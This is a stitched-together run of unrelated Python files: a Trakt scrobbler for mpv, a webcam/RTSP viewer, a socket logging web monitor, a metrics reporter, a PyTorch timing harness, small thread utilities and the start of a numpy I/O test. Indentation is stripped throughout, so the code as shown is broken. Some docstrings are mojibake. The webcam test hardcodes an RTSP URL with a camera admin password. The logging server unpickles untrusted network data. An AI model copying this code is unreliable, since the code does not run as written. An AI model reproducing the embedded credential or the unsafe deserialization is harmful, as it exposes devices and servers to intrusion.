# when a new file starts, act as if a new mpv instance got connected
if event_name == 'start-file':
on_disconnected()
on_connected(monitor)
elif event_name == 'pause' or event_name == 'unpause' or event_name == 'seek':
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_connected(monitor):
log.debug('on_connected()')
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_disconnected():
log.debug('on_disconnected()')
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer, next_regular_timer
global is_local_state_dirty
if next_sync_timer is not None:
next_sync_timer.cancel()
if next_regular_timer is not None:
next_regular_timer.cancel()
if last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
threading.Thread(target=sync_to_trakt, args=(
last_is_paused, last_playback_position, last_working_dir, last_path, last_duration,
last_file_start_timestamp, True)).start()
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
def issue_scrobble_commands(monitor):
monitor.send_get_property_command('working-directory')
monitor.send_get_property_command('path')
monitor.send_get_property_command('percent-pos')
monitor.send_get_property_command('pause')
monitor.send_get_property_command('duration')
schedule_regular_timer(monitor)
def schedule_regular_timer(monitor):
global next_regular_timer
if next_regular_timer is not None:
next_regular_timer.cancel()
next_regular_timer = threading.Timer(config['seconds_between_regular_get_property_commands'],
issue_scrobble_commands, [monitor])
next_regular_timer.start()
def is_finished(playback_position, duration, start_time):
if start_time is not None:
watch_time = time.time() - start_time
# only consider a session finished if
# at least a minimal playback position is reached
# and
# the session is running long enough
if playback_position >= config['percent_minimal_playback_position_before_scrobble'] \
and watch_time >= duration * config['factor_must_watch_before_scrobble']:
return True
return False
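# Worked example: with percent_minimal_playback_position_before_scrobble = 80
# and factor_must_watch_before_scrobble = 0.5 (illustrative config values), a
# 60-minute file only counts as finished once playback passed 80% AND the
# session has been running for at least 30 minutes.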
def is_url(url):
try:
return urllib.parse.urlparse(url).scheme != ''
    except ValueError:
return False
def sync_to_trakt(is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed):
    log.debug('sync_to_trakt(%s, %s, %s, %s, %s, %s, %s)' % (is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed))
do_sync = False
if not is_url(path) and not os.path.isabs(path):
# If mpv is not started via double click from a file manager, but rather from a terminal,
        # the path to the video file is relative rather than absolute. The
        # monitored_directories check needs an absolute path, which is why we
        # join it with the working directory.
path = os.path.join(working_dir, path)
for monitored_directory in config['monitored_directories']:
if path.startswith(monitored_directory):
do_sync = True
break
# empty monitored_directories means: always sync
if len(config['monitored_directories']) == 0:
do_sync = True
for excluded_directory in config['excluded_directories']:
if path.startswith(excluded_directory):
do_sync = False
break
log.debug('do_sync = %s' % (do_sync))
if do_sync:
guess = guessit.guessit(path)
log.debug(guess)
data = get_cached_trakt_data(guess)
if data is not None:
data['progress'] = playback_position
data['app_version'] = '1.0.3'
finished = is_finished(playback_position, duration, start_time)
# closed finished paused trakt action
# False False False start
# False False True pause
# False True False start
# False True True pause
# True False False pause
# True False True pause
# True True False stop
# True True True stop
# is equal to:
if mpv_closed:
if finished:
# trakt is closing and finished watching
# trakt action: stop
url = 'https://api.trakt.tv/scrobble/stop'
else:
# closed before finished watching
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
elif is_paused:
# paused, while still open
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
else:
# watching right now
# trakt action: start
url = 'https://api.trakt.tv/scrobble/start'
req = requests.post(url,
json=data,
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id(),
'Authorization': 'Bearer ' + trakt_v2_oauth.get_access_token()})
log.info('%s %s %s', url, req.status_code, req.text)
if 200 <= req.status_code < 300:
global is_local_state_dirty
is_local_state_dirty = False
def get_cached_trakt_data(guess):
# load cached ids
if os.path.isfile(TRAKT_ID_CACHE_JSON):
with open(TRAKT_ID_CACHE_JSON) as file:
id_cache = json.load(file)
else:
id_cache = {
'movies': {},
'shows': {}
}
# constructing data to be sent to trakt
# if show or movie name is not found in id_cache, request trakt id from trakt API and cache it.
# then assign dict to data, which has the structure of the json trakt expects for a scrobble call
data = None
if guess['type'] == 'episode':
if guess['title'].lower() not in id_cache['shows']:
log.info('requesting trakt id for show ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/show?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = req.json()[0]['show']['ids']['trakt']
else:
# write n/a into cache, so that unknown shows are only requested once.
                # without it, unknown shows would be requested again on every get_cached_trakt_data() call
trakt_id = 'n/a'
log.warning('trakt request failed or unknown show ' + str(guess))
id_cache['shows'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['shows'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'show': {'ids': {'trakt': id_cache['shows'][guess['title'].lower()]}},
'episode': {'season': guess['season'], 'number': guess['episode']}}
elif guess['type'] == 'movie':
if guess['title'].lower() not in id_cache['movies']:
log.info('requesting trakt id for movie ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/movie?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = req.json()[0]['movie']['ids']['trakt']
else:
# write n/a into cache, so that unknown movies are only requested once.
                # without it, unknown movies would be requested again on every get_cached_trakt_data() call
trakt_id = 'n/a'
log.warning('trakt request failed or unknown movie ' + str(guess))
id_cache['movies'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['movies'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'movie': {'ids': {'trakt': id_cache['movies'][guess['title'].lower()]}}}
else:
log.warning('Unknown guessit type ' + str(guess))
# update cached ids file
with open(TRAKT_ID_CACHE_JSON, mode='w') as file:
json.dump(id_cache, file)
return data
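# Shape of TRAKT_ID_CACHE_JSON after a few lookups (illustrative ids):
#
#   {"shows": {"some show": 123, "unknown show": "n/a"},
#    "movies": {"some movie": 456}}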
def main():
log.info('launched')
with open('config.json') as file:
global config
config = json.load(file)
monitor = mpv.MpvMonitor.create(on_connected, on_event, on_command_response, on_disconnected)
try:
trakt_v2_oauth.get_access_token() # prompts authentication, if necessary
while True:
if monitor.can_open():
# call monitor.run() as a daemon thread, so that all SIGTERMs are handled here
# Daemon threads die automatically, when the main process ends
thread = threading.Thread(target=monitor.run, daemon=True)
thread.start()
thread.join()
# If thread joins, mpv was closed.
log.info('mpv closed')
else:
# mpv not open
# sleep before next attempt
time.sleep(config['seconds_between_mpv_running_checks'])
except KeyboardInterrupt:
log.info('terminating')
logging.shutdown()
def register_exception_handler():
def error_catcher(*exc_info):
log.critical("Unhandled exception", exc_info=exc_info)
sys.excepthook = error_catcher
# from http://stackoverflow.com/a/31622038
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('log.conf')
register_exception_handler()
main()
|
test.py
|
import cv2
import numpy as np
import time
import os
import threading
import queue
import multiprocessing
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from web camera.
Argument:
max_framerate {float}: the real framerate will be reduced below this value.
webcam_idx {int}: index of the web camera on your laptop. It should be 0 by default.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
        self._is_stopped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
        return True  # the web camera always has a new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
        self._is_stopped = True
def __del__(self):
        if not self._is_stopped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
def select_images_loader(src_data_type, src_data_path):
if src_data_type == "webcam":
if src_data_path == "":
webcam_idx = 0
elif src_data_path.isdigit():
webcam_idx = int(src_data_path)
else:
webcam_idx = src_data_path
images_loader = ReadFromWebcam(
25, webcam_idx)
return images_loader
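# select_images_loader currently only handles "webcam"; src_data_path may be
# an empty string (default device 0), a digit string (device index), or a
# stream URL such as an RTSP address, which cv2.VideoCapture also accepts.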
# class DetectFall():
# def __init__(self, label_save, window_size=32, time_save=180):
# self.window_size = window_size
# self.time_save = time_save
# self.time = -1
# self.label_save = label_save
# self.save_video = SaveImage(window_size=self.window_size*3)
# self.classifi = ClassifierOnTest(window_size=self.window_size)
# self.skeleton = SkeletonDetector()
def detect(images_loader):
# vs = cv2.VideoCapture(link_camera)
while images_loader.has_image():
frame = images_loader.read_image()
# (grabbed, frame) = vs.read()
# if not grabbed:
# break
cv2.imshow("demo",frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# sk = self.skeleton.detect(frame)
# self.save_video.add_image_for_video(frame)
# predict = self.classifi.predict(np.array(sk))
# print(predict)
# if predict==self.label_save:
# if self.time == -1:
# self.save_video.save_img2video('data/test.avi')
# self.time = int(time.time())
# elif int(time.time()) - self.time > self.time_save:
# self.save_video.save_img2video('data/test.avi')
# self.time = int(time.time())
if __name__ == "__main__":
# save_video = SaveImage(64)
# classi = ClassifierOnTest(window_size=32)
# skeleton = SkeletonDetector()
path_video = 'rtsp://admin:D9ng2612@192.168.1.180:554/cam/realmonitor?channel=1&subtype=1'
# frame_provider = ImageReader(images)
images_loader = select_images_loader('webcam', path_video)
# test_demo(net, 256, None, 1, 1, images_loader)
detect(images_loader)
# save_video.add_image_for_video(frame)
# save_video.save_img2video('test.avi')
|
recipe-577025.py
|
"""
LoggingWebMonitor - a central logging server and monitor.
Listens for log records sent from other processes running
in the same box or network. Collects and saves them
concurrently in a log file. Shows a summary web page with
the latest N records received.
Usage:
- Add a SocketHandler to your application::
from logging.handlers import SocketHandler, DEFAULT_TCP_LOGGING_PORT
socketh = SocketHandler(servername, DEFAULT_TCP_LOGGING_PORT)
logging.getLogger('').addHandler(socketh)
where servername is the host name of the logging server ('localhost'
if run on the same box)
- Start an instance of this script (the logging server).
This will open two listening sockets:
- one at DEFAULT_TCP_LOGGING_PORT (9020), listening for
logging events from your application
- a web server at DEFAULT_TCP_LOGGING_PORT+1 (9021),
showing a summary web page with the latest 200
log records received. That web page will be
opened by default, using your preferred web browser.
- You may add additional handlers or filters to this script;
see fileHandler below.
- Note that several separate processes *cannot* write to the same
logging file; this script avoids that problem, providing
the necessary isolation level.
- If you customize the logging system here, make sure `mostrecent`
(instance of MostRecentHandler) remains attached to the root logger.
Author: Gabriel A. Genellina, based on code from Vinay Sajip and
doug.farrell
This has been tested with Python versions 2.3 thru 2.6; on versions
older than 2.5, Ctrl-C handling and the stack trace may not work
as expected.
"""
import os
import sys
import cPickle
import logging
import logging.handlers
import SocketServer
import BaseHTTPServer
import struct
import threading
import datetime
import cgi
import time
try:
from collections import deque
except ImportError:
# pre 2.5
class deque(list):
def popleft(self):
elem = self.pop(0)
return elem
try:
reversed
except NameError:
# pre 2.4
def reversed(items):
return items[::-1]
class MostRecentHandler(logging.Handler):
'A Handler which keeps the most recent logging records in memory.'
def __init__(self, max_records=200):
logging.Handler.__init__(self)
self.logrecordstotal = 0
self.max_records = max_records
try:
self.db = deque([], max_records)
except TypeError:
# pre 2.6
self.db = deque([])
def emit(self, record):
self.logrecordstotal += 1
try:
self.db.append(record)
# pre 2.6
while len(self.db)>self.max_records:
self.db.popleft()
except Exception:
self.handleError(record)
# taken from the logging package documentation by Vinay Sajip
class LogRecordStreamHandler(SocketServer.StreamRequestHandler):
'Handler for a streaming logging request'
def handle(self):
'''
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format.
'''
while 1:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack('>L', chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
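    # For reference, logging.handlers.SocketHandler produces the matching
    # framing on the sender side, roughly:
    #
    #   data = cPickle.dumps(dict(record.__dict__), 1)
    #   sock.sendall(struct.pack('>L', len(data)) + data)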
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
# if a name is specified, we use the named logger rather than the one
# implied by the record.
if self.server.logname is not None:
name = self.server.logname
else:
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
class LoggingReceiver(SocketServer.ThreadingTCPServer):
'Simple TCP socket-based logging receiver'
logname = None
def __init__(self, host='localhost',
port=None,
handler=LogRecordStreamHandler):
if port is None:
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
SocketServer.ThreadingTCPServer.__init__(self, (host, port), handler)
# idea and page layout taken from python-loggingserver by doug.farrell
# http://code.google.com/p/python-loggingserver/
class LoggingWebMonitorRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
datefmt = '%Y-%m-%d %H:%M:%S'
formatter = logging.Formatter(
fmt='%(asctime)s\n%(name)s\n%(levelname)s\n%(funcName)s (%(filename)s:%(lineno)d)\n%(message)s',
datefmt=datefmt)
default_css = """\
body {
font-family: verdana, arial, helvetica, sans-serif;
}
table {
margin-left: auto;
margin-right: auto;
width: 100%;
border: 1px solid black;
margin-top: 3ex;
}
table caption {
/*font-weight: bold;*/
text-align: center;
font-size: larger;
margin-bottom: 0.5ex;
}
tr {
font-family: "Lucida Console", monospace;
}
th, td {
padding: 0.5ex;
}
tr.critical {
background-color: red;
color: yellow;
text-decoration: blink;
}
tr.error {
background-color: #ff3300; /* red */
color: yellow;
}
tr.warn, tr.warning {
background-color: #ffff99; /* yellow */
color: black;
}
tr.info, td.info {
background-color: #90EE90; /* lightgreen */
color: black;
}
tr.debug {
background-color: #7FFFD4; /* aquamarine */
color: black;
}
table.vtable tr th {
font-weight: bold;
text-align: right;
}
table.htable tr th {
font-weight: bold;
text-align: center;
}
table.htable tr.heading,
table.vtable tr th.heading {
background-color: #E0E0E0;
}
"""
summary_html = """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<meta http-equiv="refresh" content="5">
<title>Logging Server Status Page</title>
<link rel="stylesheet" type="text/css" href="/default.css">
</head>
<body>
<table class="vtable">
<caption>Logging Server Status Page</caption>
<tr>
<th class="heading">Logging Server Start Time</th>
<td class="info">%(starttime)s</td>
</tr>
<tr>
<th class="heading">Logging Server Up Time</th>
<td class="info">%(uptime)s</td>
</tr>
<tr>
<th class="heading">Log Records Total</th>
<td class="info">%(logrecordstotal)s</td>
</tr>
</table>
<table class="htable">
<caption>Most Recent Log Records</caption>
<tr class="heading"><th>Date</th><th>Channel</th><th>Level</th><th>Location</th><th>Message</th></tr>
%(records)s
</table>
<p style="text-align:right">
<a href="http://jigsaw.w3.org/css-validator/check/referer">
<img style="border:0;width:88px;height:31px"
src="http://jigsaw.w3.org/css-validator/images/vcss"
alt="Valid CSS">
</a>
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Strict" height="31" width="88"></a>
</p>
</body>
</html>
"""
def do_GET(self):
'Serve a GET request.'
sts, response, type = self.build_response(self.path)
self.send_response(sts)
if sts==301:
self.send_header('Location', response)
if type:
self.send_header('Content-type', type)
self.send_header('Content-Length', str(len(response)))
self.end_headers()
if response:
self.wfile.write(response)
def build_response(self, path):
try:
if path == '/summary.html':
return 200, self.summary_page(), 'text/html'
if path == '/default.css':
return 200, self.default_css, 'text/css'
if path == '/':
return 301, '/summary.html', 'text/html'
return 404, None, None
except Exception:
import traceback
print >>sys.stderr, 'While handling %r:' % path
traceback.print_exc(file=sys.stderr)
return 500, None, None
def summary_page(self):
escape = cgi.escape
mostrecent = self.server.mostrecent
starttime = escape(self.server.starttime.strftime(self.datefmt))
uptime = datetime.datetime.now() - self.server.starttime
uptime = escape(str(datetime.timedelta(uptime.days, uptime.seconds)))
logrecordstotal = escape(str(mostrecent.logrecordstotal))
formatter = self.formatter
items = []
for record in reversed(list(mostrecent.db)):
try:
cells = escape(formatter.format(record)).split('\n', 4)
cells = ['<td>%s</td>' % cell for cell in cells]
cells[-1] = cells[-1].replace('\n', '<br>\n') # message & stack trace
items.append('<tr class="%s">%s\n</tr>' %
(escape(record.levelname.lower()), ''.join(cells)))
except Exception:
import traceback
print >>sys.stderr, 'While generating %r:' % record
traceback.print_exc(file=sys.stderr)
records = '\n'.join(items)
d = dict(starttime=starttime,
uptime=uptime,
logrecordstotal=logrecordstotal,
records=records)
return self.summary_html % d
def log_message(self, format, *args):
pass
class LoggingWebMonitor(BaseHTTPServer.HTTPServer):
'A simple web page for displaying logging records'
def __init__(self, host='localhost',
port=None,
                 handler=LoggingWebMonitorRequestHandler):
if port is None:
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT + 1
BaseHTTPServer.HTTPServer.__init__(self, (host, port), handler)
self.starttime = datetime.datetime.now()
if not hasattr(SocketServer.TCPServer, 'shutdown'):
# pre 2.6
_original_get_request = SocketServer.TCPServer.get_request
def serve_forever(self):
while not self.quit:
self.handle_request()
def shutdown(self):
self.quit = True
def get_request(self):
self.socket.settimeout(30)
request, client_address = _original_get_request(self)
request.settimeout(30)
return request, client_address
for cls in (LoggingReceiver, LoggingWebMonitor):
cls.serve_forever = serve_forever
cls.shutdown = shutdown
cls.get_request = get_request
cls.quit = False
def main():
mostrecent = MostRecentHandler()
rootLogger = logging.getLogger('')
rootLogger.setLevel(logging.DEBUG)
rootLogger.addHandler(mostrecent)
## You may add additional handlers like this FileHandler
## that logs every message to a file
## named after this module name, with extension .log
#
#formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
#fileHandler = logging.FileHandler(os.path.splitext(__file__)[0] + '.log')
#fileHandler.setFormatter(formatter)
#rootLogger.addHandler(fileHandler)
webmonitor = LoggingWebMonitor()
webmonitor.mostrecent = mostrecent
thr_webmonitor = threading.Thread(target=webmonitor.serve_forever)
thr_webmonitor.daemon = True
print '%s started at %s' % (webmonitor.__class__.__name__, webmonitor.server_address)
thr_webmonitor.start()
recv = LoggingReceiver()
thr_recv = threading.Thread(target=recv.serve_forever)
thr_recv.daemon = True
print '%s started at %s' % (recv.__class__.__name__, recv.server_address)
thr_recv.start()
import webbrowser
webbrowser.open('http://%s:%s/' % webmonitor.server_address)
while True:
try: time.sleep(3600)
except (KeyboardInterrupt, SystemExit):
recv.shutdown()
webmonitor.shutdown()
break
return 0
if __name__ == '__main__':
sys.exit(main())
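# Usage sketch (not part of the module): any application can feed this
# monitor by attaching a stock SocketHandler pointed at the receiver's
# default port. Hostname and logger names below are placeholder assumptions.
#
# import logging, logging.handlers
# sock = logging.handlers.SocketHandler(
#     'localhost', logging.handlers.DEFAULT_TCP_LOGGING_PORT)
# logging.getLogger('').addHandler(sock)
# logging.getLogger('demo').warning('hello, web monitor')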
|
reporter.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BlueKing PaaS Community Edition available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import time
import logging
import threading
from typing import Optional
import requests
from prometheus_client import (
REGISTRY,
CollectorRegistry,
generate_latest,
)
from prometheus_client.parser import text_string_to_metric_families
logger = logging.getLogger("bk-monitor-report")
class MonitorReporter:
def __init__(
self,
data_id: int,
access_token: str,
target: str,
url: str,
report_interval: int = 60,
registry: Optional[CollectorRegistry] = REGISTRY,
):
"""
:param data_id: ็ๆง Data ID
:param access_token: ่ชๅฎไนไธๆฅ Token
:param target: ไธๆฅๅฏไธๆ ๅฟ็ฌฆ
:param url: ไธๆฅๅฐๅ
:param report_interval: ๅจๆๆงไธๆฅ้ด้๏ผๅไฝไธบ็ง, defaults to 60
:param registry: promethues ๆๆ ่ทๅๆฅๆบ, defaults to REGISTRY
"""
self.data_id = data_id
self.access_token = access_token
self.target = target
self.url = url
self.registry = registry
self.report_interval = report_interval
self._report_thread = None
def generate_report_data(self):
data = {"data_id": self.data_id, "access_token": self.access_token, "data": []}
timestamp = round(time.time() * 1000)
metrics_text = generate_latest(self.registry).decode("utf-8")
for family in text_string_to_metric_families(metrics_text):
for sample in family.samples:
data["data"].append(
{
"metrics": {sample.name: sample.value},
"target": self.target,
"dimension": sample.labels,
"timestamp": timestamp,
}
)
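        # Resulting payload shape (values illustrative, one entry per sample):
        # {
        #   "data_id": 123456,
        #   "access_token": "...",
        #   "data": [{"metrics": {"demo_requests_total": 1.0},
        #             "target": "demo-service",
        #             "dimension": {"label": "value"},
        #             "timestamp": 1600000000000}]
        # }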
return data
def report(self):
data = self.generate_report_data()
try:
resp = requests.post(self.url, json=data)
except Exception:
logger.exception("[MonitorReporter]data({}) report to {} failed".format(data, self.url))
return
        if not resp.ok:
            logger.error("[MonitorReporter]data({}) report to {} failed, resp: {}".format(data, self.url, resp.text))
            return
        logger.info("[MonitorReporter]report finish: {}".format(resp.text))
def _periodic_report_helper(self):
report_start_time = time.perf_counter()
try:
self.report()
except Exception:
logger.exception("[MonitorReporter]periodic report to {} failed".format(self.url))
report_cost = time.perf_counter() - report_start_time
logger.exception("[MonitorReporter]periodic report cost {}s".format(report_cost))
sleep_interval = self.report_interval - report_cost
if sleep_interval > 0:
time.sleep(sleep_interval)
def _periodic_report(self):
while True:
self._periodic_report_helper()
def start(self):
if self._report_thread is not None:
logger.warning("[MonitorReporter]reporter already started")
return
        self._report_thread = threading.Thread(target=self._periodic_report, daemon=True)
        self._report_thread.start()
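# Usage sketch (illustration only; the data_id, token and url below are
# placeholder assumptions, not real credentials or endpoints):
#
# from prometheus_client import Counter
#
# requests_total = Counter("demo_requests_total", "Demo request counter")
# reporter = MonitorReporter(
#     data_id=123456,
#     access_token="<access-token>",
#     target="demo-service",
#     url="http://bk-monitor.example.com/v2/push/",
# )
# requests_total.inc()
# reporter.start()  # daemon thread, reports every report_interval seconds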
|
test_net.py
|
from utils.logger import Writer
import threading
import torch
from torchstat import stat
import time
from path import Path
class TestNet():
    def __init__(self, running_on, dev, name, height, width):
super(TestNet, self).__init__()
self.running_on = running_on
self.device = torch.device(dev)
self.feed_width = width
self.feed_height = height
self.onnx_dir = Path("./onnxs")
self.onnx_dir.mkdir_p()
        self.writer = Writer()
        self.out_width = 640
        self.out_height = 480
        self.network = None
        self.name = name
        # self.network = networks.ResNet(layers=18, decoder='nnconv5', output_size=[self.feed_width, self.feed_height]).to(
        #     self.device)
        # Timing accumulators (seconds), updated by infer()
        self.duration_en = 1
        self.duration_de = 1
        self.duration = 1
def infer(self,input):
torch.cuda.synchronize(self.device)
t1 = time.time()
features = self.encoder(input)
# disp = self.depth_decoder(features)
torch.cuda.synchronize(self.device)
t2 = time.time()
disp = self.decoder(features)
torch.cuda.synchronize(self.device)
t3 = time.time()
self.duration_en = t2 - t1
self.duration_de = t3 - t2
self.duration = t3 - t1
return disp
def Test(self):
        th2 = threading.Thread(target=self.fps)
        th2.daemon = True  # let the process exit when Test() returns
        th2.start()
example_inputs = torch.rand(1, 3, self.feed_height, self.feed_width).to(self.device)
while True:
try:
##infer
disp = self.infer(example_inputs)
except KeyboardInterrupt:
return
def fps(self):
while True:
time.sleep(1.1)
self.writer.write("encoder: {:.2f} ms\ndecoder: {:.2f}ms\ntotal: {:.2f}ms\n".format(self.duration_en*1000,self.duration_de*1000,self.duration*1000), location=(0, 5))
def onnx_out(self):
        example_inputs = torch.rand(1, 3, 224, 224)  # batch size does not matter for latency
        torch.onnx.export(model=self.network,
                          args=example_inputs,
                          f=self.onnx_dir / (self.name + ".onnx"),
                          # output_names=['f0','f1','f2','f3','f4'],
                          verbose=True,
                          export_params=True  # export model parameters along with the graph
                          )
def torch_stat(self):
stat(self.encoder.to('cpu'), input_size=(3, self.feed_width, self.feed_height))
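# Usage sketch (hypothetical): TestNet expects `encoder`/`decoder` modules to
# be attached before infer()/Test() are called; `my_encoder`/`my_decoder`
# below are placeholders for whatever networks are under test.
#
# net = TestNet(running_on="pc", dev="cuda:0", name="resnet18",
#               height=224, width=224)
# net.encoder = my_encoder.to(net.device)  # assumed torch.nn.Module
# net.decoder = my_decoder.to(net.device)  # assumed torch.nn.Module
# net.Test()  # prints per-stage latency until interrupted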
|
output.py
|
# ---------------------------------------------------------------------------
# Console output for MTDA
# ---------------------------------------------------------------------------
#
# This software is a part of MTDA.
# Copyright (c) Mentor, a Siemens business, 2017-2020
#
# ---------------------------------------------------------------------------
# SPDX-License-Identifier: MIT
# ---------------------------------------------------------------------------
# System imports
import os
import sys
import threading
class ConsoleOutput:
def __init__(self):
self.rx_alive = False
self.rx_thread = None
def start(self):
self.rx_alive = True
self.rx_thread = threading.Thread(
target=self.reader, name='console_rx')
self.rx_thread.daemon = True
self.rx_thread.start()
def reader(self):
return None
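# Usage sketch (illustration only, not part of MTDA): reader() is a stub that
# subclasses override with a blocking receive loop. A minimal echo variant,
# assuming the console bytes arrive on stdin:
#
# class EchoOutput(ConsoleOutput):
#     def reader(self):
#         while self.rx_alive:
#             line = sys.stdin.readline()
#             if not line:
#                 break
#             sys.stdout.write(line)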
|
xbox.py
|
import subprocess
import threading
class XBox(object):
def __init__(self, wireless_index=0):
self.wireless_index = wireless_index
self.value = dict(X1=0, Y1=0, X2=0, Y2=0, LT=0, RT=0,
du=0, dd=0, dl=0, dr=0,
back=0, guide=0, start=0,
A=0, B=0, X=0, Y=0, LB=0, RB=0)
def start(self):
threading.Thread(target=self.run, args=()).start()
def run(self):
p = subprocess.Popen(['xboxdrv', '-w', '%d' % self.wireless_index],
stdout=subprocess.PIPE)
while True:
line = p.stdout.readline().strip().decode('utf-8')
#print(line)
if line.startswith('X1'):
self.parse(line)
def parse(self, line):
data = line.replace(':', ': ').split()
tag = None
for item in data:
if item.endswith(':'):
tag = item[:-1]
else:
value = int(item)
self.value[tag] = value
if __name__ == '__main__':
import time
x = XBox()
x.start()
while True:
print(x.value)
time.sleep(0.01)
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import (ConverterError, ConverterLockError,
ConversionWarning)
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
            if sys.platform == 'win32' and sys.version_info >= (2, 6):
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
